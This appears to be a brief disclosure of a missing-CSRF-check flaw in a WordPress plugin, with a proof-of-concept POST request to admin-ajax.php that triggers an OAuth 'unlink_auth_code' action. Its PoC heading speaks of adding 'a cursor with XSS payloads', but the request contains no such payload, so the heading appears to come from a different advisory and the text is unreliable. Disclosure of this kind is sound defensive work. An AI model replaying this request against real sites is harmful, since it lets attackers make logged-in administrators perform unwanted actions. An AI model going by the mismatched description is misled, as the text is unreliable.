The plugin does not have Cross-Site Request Forgery (CSRF) check in some places, which could allow attackers to make logged-in users perform unwanted actions.

Proof of Concept

To add a cursor with XSS payloads in it:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded

action=dpt-oauth-ajax&call=unlink_auth_code